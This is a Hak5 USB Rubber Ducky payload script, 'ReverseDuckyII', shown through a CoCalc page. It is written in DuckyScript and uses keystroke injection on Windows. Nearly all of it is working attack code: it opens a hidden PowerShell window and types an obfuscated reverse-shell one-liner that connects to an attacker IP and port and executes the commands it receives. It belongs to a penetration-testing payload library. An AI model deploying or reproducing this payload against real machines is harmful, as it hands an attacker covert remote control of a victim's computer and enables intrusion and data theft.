Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
2964 views
1
REM       ReverseDuckyII

2
REM       Version 2.0

3
REM       OS: Windows / Multi

4
REM       Author: 0i41E

5
REM       Requirement: DuckyScript 3.0

6


7
REM       TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.

8
REM       If inserted into a non Windows machine, the Ducky will appear broken.

9
REM       DON'T FORGET TO START LISTENER

10


11
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS

12
EXTENSION PASSIVE_WINDOWS_DETECT

13
    REM VERSION 1.0

14


15
    REM Windows fully passive OS Detection and passive Detect Ready

16
    REM Includes its own passive detect ready. Does not require

17
    REM additional extensions

18


19
    REM USAGE:

20
    REM Extension runs inline (here)

21
    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic

22
    REM boot delay

23
    REM $_OS will be set to WINDOWS or NOT_WINDOWS

24


25
    REM CONFIGURATION:

26
    DEFINE MAX_WAIT 150

27
    DEFINE CHECK_INTERVAL 20

28
    DEFINE WINDOWS_HOST_REQUEST_COUNT 2

29
    DEFINE NOT_WINDOWS 7

30


31
    VAR $MAX_TRIES = MAX_WAIT

32
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

33
        DELAY CHECK_INTERVAL

34
        $MAX_TRIES = ($MAX_TRIES - 1)

35
    END_WHILE

36
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN

37
        $_OS = WINDOWS

38
    ELSE

39
        $_OS = NOT_WINDOWS

40
    END_IF

41


42
    REM EXAMPLE USAGE AFTER EXTENSION

43
    REM IF ($_OS == WINDOWS) THEN

44
    REM     STRING HELLO WINDOWS!

45
    REM ELSE

46
    REM     STRING HELLO WORLD!

47
    REM END_IF

48
END_EXTENSION

49


50
REM Configure your settings below:

51
REM Insert the attacking IP between '' & define your port

52
DEFINE ATTACKER '192.168.178.25'

53
DEFINE PORT 4444

54
REM Set the default DELAY

55
DEFINE WAIT 500

56


57
IF ($_OS == WINDOWS) THEN

58
    DELAY 1500

59
    GUI r

60
    DELAY WAIT

61
    STRINGLN powershell -NoP -NonI -w h

62
    DELAY WAIT

63
    STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit

64
REM Capslock light will indicate a finished payload

65
    CAPSLOCK

66
ELSE

67
REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF

68
    ATTACKMODE OFF

69
END_IF

70


71
 

72


73